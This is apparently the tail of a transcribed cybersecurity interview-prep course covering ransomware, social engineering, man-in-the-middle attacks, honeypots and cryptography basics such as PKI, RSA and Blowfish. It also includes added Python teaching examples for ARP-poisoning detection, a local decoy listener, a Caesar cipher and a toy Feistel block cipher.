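        ip, mac = pkt["spa"], pkt["sha"]
        if mac != pkt["eth_src"]:
            self.alerts.append(f"{ip}: ARP sender {mac} does not match frame source {pkt['eth_src']}")
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac                 # first sighting: trust on first use
        elif known != mac:
            self.alerts.append(f"{ip}: MAC changed from {known} to {mac} (possible ARP poisoning)")
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            self.alerts.append(f"{mac}: claims {sorted(self.claims[mac])}")


def run_demo():
    """Constructed scenario: gateway and victim exchange genuine replies, then an
    attacker tells each of them that the other's IP is at the attacker's MAC."""
    gw, victim, attacker = "02:00:00:00:00:01", "02:00:00:00:00:0a", "02:00:00:00:00:66"
    frames = [
        build_arp_reply(gw, "192.168.1.1", victim, "192.168.1.10"),        # genuine
        build_arp_reply(victim, "192.168.1.10", gw, "192.168.1.1"),        # genuine
        build_arp_reply(attacker, "192.168.1.1", victim, "192.168.1.10"),  # poison victim's cache
        build_arp_reply(attacker, "192.168.1.10", gw, "192.168.1.1"),      # poison gateway's cache
    ]
    mon = ArpMonitor(static={"192.168.1.1": gw})   # gateway pinned, as a static entry would be
    for f in frames:
        mon.observe(f)
    return mon.alerts


if __name__ == "__main__":
    for a in run_demo():
        print("ALERT", a)
```

The two attacker frames trigger three alerts: the gateway's IP and the victim's IP each change MAC, and one MAC ends up claiming both IPs. A detector like this only sees what is on the wire; the pinned static entry is what actually stops the victim's own cache from being overwritten, which is why the two mitigations are used together.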

In the next question we are going to discuss: what is ransomware? Ransomware is a type of malware that blocks victims from accessing personal files and demands a ransom to regain access. There are three categories, but before we go into the categories let's just revisit what ransomware is. Let's start with the word malware: malware is malicious software that poses as legitimate software but has a payload that will have a security impact on your machine. So in this instance viruses, trojans, all of these can be classified under malware, and so can ransomware. A trojan is software that will give you backdoor access to a particular device; a virus will do some destructive activity on that device; a ransomware will basically encrypt the data of that particular user on that particular machine, thus rendering that data inaccessible to the users themselves, and in turn will demand a ransom to provide access to that data.

So, the three types of ransomware. The first one is scareware, which uses social engineering to cause anxiety or the perception of a threat to manipulate users into buying unwanted software. This preys on the gullibility of humans: you can see a pop-up appearing on your screen which can scare you into believing that you may have been attacked or that there is a virus on your machine, and then it instructs you to download a particular piece of software to mitigate that virus. Now the malware will be in this software that you download, and then a ransomware will be installed and your data will be encrypted. Screen lockers lock users' computers by preventing them from logging in and displaying an official-looking message: you will see a screen once you boot up which prevents you from accessing the login page, so it will not allow you to log into your own machine, but it will give you a warning that your data has been encrypted and you need to contact a particular email address and send bitcoins over there to get a decryption key to access your own data. And then the encrypting ransomware displays a message demanding payment in return for the private asymmetric key, which is needed to decrypt the symmetric keys for the encrypted files. So once your files have been encrypted you might just have a blank screen in front of you where you'll receive a warning message which instructs you to pay a ransom in bitcoins or in some cryptocurrency to some particular digital e-wallet which is not traceable, and once you make that payment they will send you the decryption key and then you can access your data.

Then talking about the next question: what is the difference between an active and a passive cyber attack? When we talk about cyber attacks, a cyber attack is activity caused by a malicious user who wants to try to get access or cause some security incident

on the victim's devices. So there are two ways that can happen, either in an active manner or in a passive manner. In an active attack the intruder attempts to disrupt the network's normal operation, modifies data and tries to alter the system's resources. This is the more aggressive form: the attacker proactively tries to bring the network down so that communications fail, or tries to modify the data. They might encrypt it with ransomware, delete it with a virus, steal it with a trojan, or alter it so that it is no longer trustworthy.

In a passive attack, by contrast, the intruder intercepts data travelling across the network. Here the intruder eavesdrops but does not modify the message. They are just listening in and observing what is going on; they are not manipulating the data or the systems, they are simply monitoring and recording the activity that is taking place.

The next question: what is a social engineering attack? A social engineering attack is a people-based attack. The victim here is the human, and the vulnerability also lies in the human. It may be executed through a computer, but at the end of the day the weakness being exploited is the person. It is the art of manipulating people so that they end up giving up confidential information. We regularly read in the papers about somebody who was manipulated, whose passwords got compromised and whose life savings got wiped out because they shared an OTP or a password with someone. Creating a scenario in which people fall prey to this and hand personal information to strangers is where the social engineering attack comes in: the attacker constructs the scenario that will make the victim give out that confidential information.

There are three categories of this attack: phishing, spear phishing and whaling. A phishing attack is generic; it is aimed at the world at large, and whoever falls for it becomes a victim. A spear phishing attack is targeted at a specific individual, a group of individuals or an organization. A lot more research goes into spear phishing: you analyse the victim, work out what their weaknesses are, and tailor the attack to those weaknesses before launching it against those people. A whaling attack is where you go after top-level executives, the C-level executives of an organization, politicians, movie stars, wealthy and powerful people. When any of these high-value targets are attacked it is known as whaling.

Next question: what is a man-in-the-middle attack? This is something we touched on when we talked about ARP, where an ARP poisoning attack is used to get into a man-in-the-middle position. In a man-in-the-middle attack the attacking computer takes the IP address of the client and, unaware of this, the server continues to communicate with the attacker. If you remember, in a previous question we also talked about spoofing. In this scenario the attacker has spoofed their IP address to pass themselves off as a genuine client, and with that spoofing in place, either through ARP poisoning or purely because of the spoofed address, they become a man in the middle. That means they are now eavesdropping on the conversation between the actual client and the server, posing as the server towards the client. The attacker is a go-between for client and server: they can eavesdrop, copy the data if they want, and modify the data as well. So, as you can see on the screen, the attacker becomes the man in the middle, listening to the conversation that is happening between the client and the server.
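The ARP-poisoning route into a man-in-the-middle position described above leaves a signature on the wire: the victim's IP and the gateway's IP both start resolving to the attacker's MAC. The following is an added example, not code from the Simplilearn course: a small monitor that consumes (IP, MAC) pairs taken from ARP replies and raises an alert when a binding changes or when one MAC answers for several addresses. The replies, the addresses and the attacker MAC aa:aa:aa:aa:aa:aa are constructed for the demo; in a deployment the pairs would come from a packet capture.

```python
"""Detect ARP poisoning from a stream of ARP replies.

Added example (not from the Simplilearn course). The replies below are
constructed by hand to model an attacker (MAC aa:aa:aa:aa:aa:aa) who
answers for both the gateway (10.0.0.1) and the victim (10.0.0.20), so
that traffic between them flows through the attacker's machine.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class ArpMonitor:
    # IP -> MAC bindings learned from the first reply seen for each IP
    # (a real deployment would preload these from DHCP leases or inventory).
    table: dict = field(default_factory=dict)
    alerts: list = field(default_factory=list)

    def observe(self, ip: str, mac: str) -> None:
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
            return
        if known != mac:
            # The same IP is now claimed by a different MAC: either a
            # legitimate NIC swap / DHCP reassignment, or poisoning.
            self.alerts.append(f"IP {ip} moved from {known} to {mac}")
            self.table[ip] = mac  # follow the new claim so further flips are seen

    def macs_claiming_multiple_ips(self) -> dict:
        """One MAC answering for several IPs is the classic MITM fingerprint."""
        by_mac = defaultdict(set)
        for ip, mac in self.table.items():
            by_mac[mac].add(ip)
        return {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1}


def analyse(replies):
    """Feed (ip, mac) pairs through a fresh monitor and return it."""
    mon = ArpMonitor()
    for ip, mac in replies:
        mon.observe(ip, mac)
    return mon


# Constructed sample: legitimate bindings first, then the attacker's
# gratuitous replies re-binding both gateway and victim to its own MAC.
SAMPLE_REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01"),   # gateway, legitimate
    ("10.0.0.20", "00:11:22:33:44:20"),  # victim, legitimate
    ("10.0.0.1", "aa:aa:aa:aa:aa:aa"),   # attacker claims the gateway
    ("10.0.0.20", "aa:aa:aa:aa:aa:aa"),  # attacker claims the victim
]

if __name__ == "__main__":
    m = analyse(SAMPLE_REPLIES)
    for a in m.alerts:
        print("ALERT:", a)
    print("MACs answering for several IPs:", m.macs_claiming_multiple_ips())
```

Flips also happen legitimately (DHCP reassignments, hardware swaps), so an alert is a prompt to investigate rather than a verdict; seeding the table from DHCP leases or an asset inventory makes the first sighting trustworthy, and the "one MAC, many IPs" check is the stronger signal of the two.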

The next question: who are black hat hackers and white hat hackers, and what is the differentiation between them? Black hat hackers are skilled individuals who illegally hack into a system. The motive behind such an attack is mostly monetary gain. These individuals are also known as security crackers. These are your criminal hackers: those with malicious intent who hack for personal gain or simply to cause disruption. The main thing black hat hackers lack is authorization. They are not authorized to do the activity they are about to do, and they are going to gain unauthorized access to devices or data, which is going to cause losses to the organization involved.

On the other side, white hat hackers, also known as ethical hackers, are individuals who discover vulnerabilities in a computer network and help organizations mitigate them, defending those organizations from black hat hackers. So the main difference between the two types of hackers is intent and authorization. Black hat hackers have malicious intent, they try to gain personally from the vulnerabilities they find, and they have no authorization for the activity they are conducting. White hat hackers are hired by organizations, which authorize the specific activities the white hat hacker may perform to find those vulnerabilities. Once the vulnerabilities have been found, the white hat hacker reports them to management and guides them in implementing security controls to mitigate them. The main difference between a black hat and a white hat, once again, is authorization and intent.

The next question: what are honeypots? Honeypots are a very interesting device that can be introduced into a network. They are basically decoy servers deployed in a network to attract the attention of an attacker. A honeypot is there to lure the attacker into attacking that particular device, thus acting as a security blanket for the rest of the devices. Suppose an attacker has managed to bypass a firewall and is now scanning a particular network. When they scan, they will come across the various devices on that network and will then proceed to run a vulnerability scan against them. The honeypot at that point acts as bait: it presents apparent vulnerabilities to the hacker, which diverts their attention. These vulnerabilities are simulated on the device and do not actually exist. The moment the attacker starts interacting with the honeypot, that traffic is identified as malicious (a honeypot has no legitimate users, so any interaction with it is suspect) and the administrator is warned about a possible attack in progress. The administrator can then investigate, through the honeypot, what activity is going on, and reconfigure the security controls to block the attacker or mitigate the attack. So it is a decoy server that showcases or simulates vulnerabilities to an attacker in order to lure them in and safeguard the rest of the network.
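As an added example that is not part of the course, here is the honeypot idea reduced to its essentials in Python: a decoy TCP listener that presents a fake service banner and treats any connection as an alert, because a decoy has no legitimate clients. The banner text, the port (ephemeral, on 127.0.0.1 so the demo stays local) and the probe payload are all constructed for the example; `probe_decoy` plays the attacker's scanner so the whole exchange runs offline.

```python
"""Minimal TCP decoy listener (honeypot).

Added example, not part of the Simplilearn course. A honeypot has no
legitimate users, so the detection logic is simply "someone talked to
me": every accepted connection becomes an alert. Listening on 127.0.0.1
with an ephemeral port keeps the demo local; a real decoy would sit on
an address and port that look like a production service.
"""
import socket
import threading
from datetime import datetime, timezone


class DecoyListener:
    def __init__(self, host="127.0.0.1", port=0, banner=b"220 ftp.internal ready\r\n"):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]   # port 0 -> OS picks a free one
        self.banner = banner                     # constructed "vulnerable-looking" banner
        self.alerts = []

    def serve_one(self, timeout=5.0):
        """Accept one connection, capture what the peer sends, and raise an alert."""
        self.sock.settimeout(timeout)
        try:
            conn, peer = self.sock.accept()
        except socket.timeout:
            return None
        with conn:
            conn.settimeout(2.0)
            conn.sendall(self.banner)
            try:
                data = conn.recv(1024)
            except socket.timeout:
                data = b""
        alert = {
            "time": datetime.now(timezone.utc).isoformat(),
            "src_ip": peer[0],
            "src_port": peer[1],
            "decoy_port": self.port,
            "first_bytes": data[:64],
            "verdict": "suspicious: decoy has no legitimate clients",
        }
        self.alerts.append(alert)
        return alert

    def close(self):
        self.sock.close()


def probe_decoy(port, payload=b"USER admin\r\n"):
    """Stand-in for the attacker's scanner: connect, read the banner, send a command."""
    with socket.create_connection(("127.0.0.1", port), timeout=2.0) as c:
        banner = c.recv(1024)
        c.sendall(payload)
    return banner


def run_demo():
    """Start the decoy, let the fake scanner touch it, return (banner seen, alerts raised)."""
    decoy = DecoyListener()
    t = threading.Thread(target=decoy.serve_one)
    t.start()
    banner = probe_decoy(decoy.port)
    t.join()
    decoy.close()
    return banner, decoy.alerts


if __name__ == "__main__":
    banner, alerts = run_demo()
    print("scanner saw banner:", banner)
    for a in alerts:
        print("ALERT:", a)
```

The point of the design is the zero-false-positive property the course describes: the alert condition is not a signature match but the mere fact of contact, which is why honeypot alerts are such a clean signal to hand to the administrator who then adjusts the real controls.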

Those were the ten cyber security questions; in the next part we will be talking about cryptography. The first question: define cryptography, encryption and decryption. Cryptography is used by security professionals to scramble data into a non-readable format in order to secure that information. It involves converting data from a readable format into a non-readable format (encryption) and then reversing that back into readable form (decryption). For example, the word "computer" is scrambled on the slide into something unreadable. If you look at the scrambled word it would be very difficult for a human to figure out what the original word was. In this scenario we have used an algorithm that shifts the alphabet: we add two to the position of each letter, so c plus two becomes e, o plus two becomes q, m plus two becomes o, and so on, which turns "computer" into "eqorwvgt". We have done a shift of two, and the key for this algorithm is "alphabet plus 2". Anyone who figures that out can unscramble the text and convert it back to readable form. Scrambling readable data into something unreadable by using a particular key is what encryption is, and cryptography is the study and practice of such techniques. Decryption, as we discussed, shifts each letter back by two characters: e minus two becomes c, q minus two becomes o, o minus two becomes m, and so forth. Anyone who knows the key, the shift, can decrypt the message. The shift is up to the user: if I want to use "alphabet plus 5", each character is replaced by the one five positions further along, and so on.

The next question: what is the difference between cipher text and clear text? Cipher text refers to the text after encryption, which is unreadable; the message recovered after decryption is known as clear text (or plain text), and that text is comprehensible. So the word "computer" is clear text, meaning it has not been subjected to any cryptographic transformation and reads as intended. The moment we encrypt it, scrambling it into unreadable text using any of the algorithms we will be looking at, the result is cipher text, and without the key it stays unreadable. Clear text, as discussed, is the plain word we started with; we are using the English language in this instance, so the plain word "computer" is the clear text, and once we add the encryption layer to it we get the cipher text.
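The shift cipher used in the slides, written out as an added example (not code from the course). `caesar_encrypt` and `caesar_decrypt` implement the "alphabet plus N" key the course describes, and `brute_force` adds the check a practitioner would make: with only 25 possible keys, the cipher text can be recovered by trying every shift, which is why this algorithm illustrates the vocabulary of cryptography (clear text, cipher text, key) but offers no real confidentiality. The word list used to score candidates is a constructed stand-in for a dictionary.

```python
"""Caesar shift cipher, the example used in the slides (key = shift of 2).

Added example, not from the Simplilearn course. Shows the three pieces the
slides describe (clear text in, cipher text out, a key that reverses it)
and why this is a teaching toy: the key space has only 25 useful values.
"""
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar_encrypt(clear_text: str, shift: int) -> str:
    """Shift every letter forward by `shift`; non-letters pass through unchanged."""
    out = []
    for ch in clear_text:
        if ch.isalpha() and ch in LOWER + UPPER:
            base = LOWER if ch.islower() else UPPER
            out.append(base[(base.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(cipher_text: str, shift: int) -> str:
    """Decryption is encryption with the negated key (e - 2 = c, q - 2 = o, ...)."""
    return caesar_encrypt(cipher_text, -shift)


# Constructed stand-in for a dictionary: words a candidate plaintext might contain.
COMMON_WORDS = {"the", "and", "computer", "attack", "security", "password"}


def brute_force(cipher_text: str):
    """Try all 25 shifts; return (shift, candidate) pairs containing a known word.

    This is the whole attack on a Caesar cipher: the key space is so small
    that an adversary does not need the key, only the patience for 25 tries.
    """
    hits = []
    for shift in range(1, 26):
        candidate = caesar_decrypt(cipher_text, shift)
        if any(word in candidate.lower().split() for word in COMMON_WORDS):
            hits.append((shift, candidate))
    return hits


if __name__ == "__main__":
    ct = caesar_encrypt("computer", 2)
    print(ct)                          # eqorwvgt
    print(caesar_decrypt(ct, 2))       # computer
    print(brute_force(caesar_encrypt("the computer security password", 5)))
```

Running the brute force shows what "depends on the user" really means for this algorithm: the user's choice of shift changes nothing about the attacker's effort, since every shift is tried in milliseconds.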

Moving on to the next question: what is a block cipher? This refers to a method of encrypting the plain message block by block. The plain message is broken into fixed-size blocks and each block is encrypted. In this course block ciphers are presented as the tool for data at rest, for example data stored on a hard disk that we want to encrypt, and that is indeed a common use; but it is a simplification. A block cipher is a keyed algorithm that transforms one fixed-size block at a time, and with a suitable mode of operation the same cipher (AES, for instance) protects data in transit as well, such as in TLS. In the example on the slide we have a plain text block that is 64 bits in size, we combine it with the key we studied in the previous questions, and the output is a scrambled block of the same size that is unreadable and thus encrypted.

Then the next question: what is public key infrastructure? A public key infrastructure is a set of policies that secures the communication between a server and a client. It uses two cryptographic keys, a public key and a private key.

The infrastructure itself is a set of policies, people, procedures and techniques that are standardized and globally accepted, and that allow us to use digital certificates to encrypt and sign data at one end and decrypt or verify it at the other. We use asymmetric encryption here, which means two keys: a public key to encrypt and a private key to decrypt. The other kind of encryption is symmetric encryption, where the same key is used both to encrypt and to decrypt.

Because a PKI is standardized, it defines the various players. The first is the user or sender, the one who needs a digital certificate in order to digitally sign a transaction or a communication. Then the registration authority, with whom they register for that certificate; the certification authority, which issues the certificate; the validation authority, which confirms that a certificate is still valid; and the recipient, who is the other party to the transaction. So how is this used?

The sender who requires a digital signature applies for a certificate with the registration authority. The registration authority validates the genuineness of the user, so they might do identity verification, proof of residence or something like that. Once they have identified the person and validated the information, they forward the request to the certification authority, stating that the sender has been verified and a digital certificate can be issued. The key pair belongs to the sender: the private key stays with the sender and is never shared, while the public key goes into the certificate, which the certification authority signs to bind that public key to the sender's identity. When the sender signs some data and sends it to the recipient, they sign it with their private key and attach the certificate. The recipient checks the signature with the public key in the certificate, and asks the validation authority whether the certificate is still good, that is, that it has not expired or been revoked (in practice this means consulting a certificate revocation list or an OCSP responder maintained on behalf of the certification authority). If the signature verifies and the validation authority confirms the certificate, the transaction goes through. If the signed data has been tampered with, the signature will not verify; if the validation authority cannot vouch for the certificate, a denial comes back to the recipient; either way the transaction does not go through.

So the PKI enables trusted digital identities for people and grants secure access to digital resources based on the infrastructure that has been created. The core of the PKI is the certification authority, which ensures the trustworthiness of the digital data. Going back to the previous slide, those are the key players standardized in a public key infrastructure: the certification authority is the authority that issues the digital certificates and the validation authority is the one that validates them.

Moving on: what is RSA? RSA is one of the first public key cryptosystems and is used for secure data transmission. The name stands for Rivest, Shamir and Adleman, after Ron Rivest, Adi Shamir and Leonard Adleman, the three inventors of the technique. It is an asymmetric cryptography algorithm that works with a pair of keys, public and private: the encryption key is public and the decryption key is kept private, and for digital signatures the roles are reversed, the private key signs and the public key verifies. As we discussed earlier, symmetric cryptography is where the same key is used to encrypt and decrypt, whereas asymmetric cryptography uses two different keys.

Now, what are a few alternatives to RSA? In the previous question we talked about RSA, the algorithm named after Rivest, Shamir and Adleman, and there are many other algorithms you can use to scramble data, depending on how secure you need that data to be. A note on the list shown on the slide, though: Duo Security, Okta, Google Authenticator and LastPass are not encryption algorithms. They are alternatives to RSA SecurID, the authentication token product sold by the company RSA, not to the RSA algorithm. LastPass is a password manager; Duo Security is a multi-factor authentication service; Google Authenticator is an application we install on our mobile devices and set up against certain portals, after which it issues a one-time code that grants us access to those portals; and Okta is an identity manager, where you create digital identities, assign them permissions, and Okta allows or denies access to the applications and portals you have configured, based on your authentication mechanisms. So all four are authentication and authorization products. Alternatives to the RSA algorithm itself are other public key systems, for example elliptic curve cryptography (ECDSA and ECDH), which provides comparable security with much shorter keys.

Next question: what are the prime objectives of modern cryptography? This is a very important question, because so far we have looked at what cryptography is and what public key infrastructure is, but what do we actually achieve with them, why are we using them and what do we want to gain?

The main, prime objectives of modern cryptography are the four shown on your screen: confidentiality, non-repudiation, authenticity and integrity.

Confidentiality is where I want to keep data confidential, that is, visible only to authorized users. So I create a list of people who are deemed authorized users, give each of them a digital identity, and attach access controls to those identities. That is how confidentiality is ensured: when we want to keep data confidential we define who is allowed to access which resources and with what level of access, administrative or user level, and only those authorized users are able to reach those resources. Encryption enforces this technically: once data has been encrypted to my public key, only my private key can decrypt it, wherever the cipher text is stored or sent.

Non-repudiation is the prevention of denial of having been part of a particular transaction. In the public key infrastructure we discussed, a digital signature is used to sign a transaction before it is sent to the recipient. The sender cannot then deny having originated that transaction, because it was signed with their private key and is verified through their digital certificate. That is non-repudiation. Another everyday example is SMS on our mobile phones: when we send a message, the operator records the originating number, so the sender cannot deny having sent it, and the sender can request a delivery report showing the message reached the recipient's inbox, so the recipient cannot deny having received it. Both parties are prevented from denying their part in the transaction.

Then comes authenticity. Under confidentiality we created a digital identity, assigned it to a person and gave them a digital signature so they cannot deny their transactions; authenticity is the part where they prove that they are who they claim to be. If I claim a digital identity, I have to prove that I am that person. An example is gmail.com: the site first asks for our username, normally our email address, which identifies the account we are trying to access. That account is restricted to one authorized person, so once we have identified it, the authentication step follows and asks for the password. It has never happened that we go to gmail.com, type in only a password and the site works out which account we mean. The first step is always identification, which account we are talking about, and then we authenticate as the owner of that account by providing the correct password; only if both match do we get access and can carry out whatever transactions we want to make. Confidentiality follows from this, because the access controls attached to that identity decide what we may see. Once we are making those transactions, non-repudiation comes into play, because all our activity is logged: we have identified the account, we have authenticated by providing the password, so there is proof it was us, and every action we take, sending an email, receiving one, deleting something, attaching something, is logged and stored as evidence of what was done. If tomorrow we deny having sent an email, Gmail can still show through those logs that the activity was ours.

The fourth part is integrity, which ensures that the data sent by the sender and received by the recipient has not been modified while in motion. Integrity is the trustworthiness of the data: that it has not been altered by a hacker or any other entity and can still be relied upon. Those are the four prime objectives of modern cryptography, and by combining these mechanisms, encryption for confidentiality and digital signatures for non-repudiation, authenticity and integrity, we achieve all four.

Next question: what is SAFER? SAFER stands for Secure And Fast Encryption Routine, and it is also a block cipher; as discussed previously, a block cipher encrypts data in fixed-size blocks. It has a 64-bit block size and is a byte-oriented algorithm. SAFER's encryption and decryption procedures are considered secure, and the slide notes that this technology is used in applications such as digital payment cards. Think of using a digital payment gateway: you have gone to an online portal, you want to purchase a particular item, and it takes you to a payment gateway where you fill in your credit card information, sensitive details like the expiry date and the CVV, and then the OTP or the password you created for your account. All of this needs to be highly secured in line with PCI DSS, the Payment Card Industry Data Security Standard, which requires that appropriate cryptographic protocols are used to attain that level of security; SAFER is one of the block ciphers used within that payment card infrastructure.

Next question: how does public key infrastructure work? We have already covered this in the earlier diagrams and identified the key players: the certification authority, the registration authority, the end user who requires the digital certificate, the validation authority that validates it, and the recipient with whom the transaction is conducted. The first step is that the request for a digital certificate is sent to the registration authority. They validate it and give the go-ahead to the certification authority, which processes the request and issues the digital certificate to the person who requested it. When that person wants to conduct a transaction, they sign it with the private key matching that certificate and send it to the other end user. The recipient verifies the signature with the public key in the certificate and confirms with the validation authority that the certificate is still valid, and once validated the transaction goes through.

And now the last question: what is the Blowfish algorithm? It is a 64-bit block symmetric encryption algorithm, meaning the same secret key is used to encrypt and to decrypt the messages. Its operations are based on exclusive ORs and additions on 32-bit words, and the key has a variable length of up to 448 bits. This is a little bit technical; you may not want to go into this much depth in an interview question. You just need to identify what the algorithm is used for and whether it is a symmetric algorithm, which uses the same key, or an asymmetric algorithm, which uses a public key to encrypt and a private key to decrypt. So Blowfish is just one more algorithm that uses symmetric encryption to encrypt and decrypt data, unlike asymmetric algorithms such as the RSA we have seen. As far as the interview questions are concerned, what we need to remember is which algorithms are symmetric, which are asymmetric, what symmetric algorithms do and what asymmetric algorithms do.

We also looked at block ciphers and stream ciphers. Block ciphers encrypt data in fixed-size blocks, and stream ciphers encrypt data one bit or byte at a time as it flows. The course summarizes this as block ciphers for data at rest and stream ciphers for data in motion, which is a useful memory aid but not a hard rule: block ciphers combined with a mode of operation such as CBC or GCM protect data in motion all the time, and stream ciphers such as ChaCha20 likewise appear in transport protocols.
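Since the block-cipher question and the Blowfish question both describe a 64-bit block cipher built from XOR and 32-bit additions, here is one added example that covers both (not code from the course, and not Blowfish itself): a toy Feistel cipher with Blowfish's outline, plus ECB and CBC modes on top of it. It shows concretely what encrypting "block by block" means, why ECB leaks repeated plaintext blocks, and how chaining (CBC) fixes that, which is the same construction that protects data in motion, not only data at rest. SHA-256 stands in for Blowfish's key-dependent S-boxes, and the key and message are constructed for the demo.

```python
"""Toy 64-bit Feistel block cipher with ECB and CBC modes.

Added example, not from the Simplilearn course and not Blowfish itself: it
copies Blowfish's shape (64-bit block, 16 Feistel rounds, round function of
XOR and 32-bit addition, key of 32..448 bits) but uses SHA-256 in place of
Blowfish's key-dependent S-boxes. Teaching code only; use AES from a vetted
library for real data.
"""
import hashlib
import secrets

BLOCK = 8            # 64-bit block, as in Blowfish, DES and SAFER
ROUNDS = 16
MASK32 = 0xFFFFFFFF

def round_keys(key: bytes):
    """Derive 16 32-bit round keys from a 4..56 byte (32..448-bit) key."""
    if not 4 <= len(key) <= 56:
        raise ValueError("key must be 4..56 bytes")
    return [int.from_bytes(hashlib.sha256(key + bytes([i])).digest()[:4], "big")
            for i in range(ROUNDS)]

def f(right: int, k: int) -> int:
    """Round function: hash the 32-bit half, then add the round key mod 2^32."""
    h = int.from_bytes(hashlib.sha256(right.to_bytes(4, "big")).digest()[:4], "big")
    return (h + k) & MASK32

def encrypt_block(block: bytes, rk) -> bytes:
    left, right = int.from_bytes(block[:4], "big"), int.from_bytes(block[4:], "big")
    for k in rk:
        left, right = right, left ^ f(right, k)     # Feistel swap-and-mix
    return left.to_bytes(4, "big") + right.to_bytes(4, "big")

def decrypt_block(block: bytes, rk) -> bytes:
    left, right = int.from_bytes(block[:4], "big"), int.from_bytes(block[4:], "big")
    for k in reversed(rk):                          # same steps, keys in reverse
        left, right = right ^ f(left, k), left
    return left.to_bytes(4, "big") + right.to_bytes(4, "big")

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK                   # PKCS#7 style: always 1..8 bytes
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Each block encrypted on its own: equal plaintext blocks give equal ciphertext."""
    rk = round_keys(key)
    return b"".join(encrypt_block(b, rk) for b in blocks(pad(plaintext)))

def cbc_encrypt(key: bytes, plaintext: bytes, iv: bytes) -> bytes:
    """Chain each block into the next; the IV is prepended so the receiver can decrypt."""
    rk, prev, out = round_keys(key), iv, []
    for b in blocks(pad(plaintext)):
        prev = encrypt_block(xor(b, prev), rk)
        out.append(prev)
    return iv + b"".join(out)

def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    rk, iv, body = round_keys(key), ciphertext[:BLOCK], ciphertext[BLOCK:]
    prev, out = iv, []
    for c in blocks(body):
        out.append(xor(decrypt_block(c, rk), prev))
        prev = c
    return unpad(b"".join(out))

def repeated_block_count(ciphertext: bytes) -> int:
    """How many ciphertext blocks duplicate an earlier one (pattern leakage)."""
    bs = blocks(ciphertext)
    return len(bs) - len(set(bs))

if __name__ == "__main__":
    key = b"correct horse battery staple"           # constructed 224-bit key
    msg = b"ATTACK!!" * 5                           # five identical 8-byte blocks
    print("ECB repeats:", repeated_block_count(ecb_encrypt(key, msg)))   # 4
    cbc = cbc_encrypt(key, msg, secrets.token_bytes(BLOCK))
    print("CBC repeats:", repeated_block_count(cbc[BLOCK:]))            # 0
    print("round trip ok:", cbc_decrypt(key, cbc) == msg)
```

The round trip works for any round function because the Feistel structure is invertible by construction; that is the property that lets Blowfish use a complicated F without ever needing to invert it. The repeated-block count is the practical lesson about modes: the same 64-bit primitive is safe or leaky depending entirely on how the blocks are chained, and a fresh, unpredictable IV per message is part of that chaining.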

With that we have come to the end of this video on the cyber security full course. I hope it was informative and interesting. If you have any questions related to the topics covered in this video, please ask away in the comments section below and our team will help you resolve your queries. Thanks for watching, stay safe and keep learning.

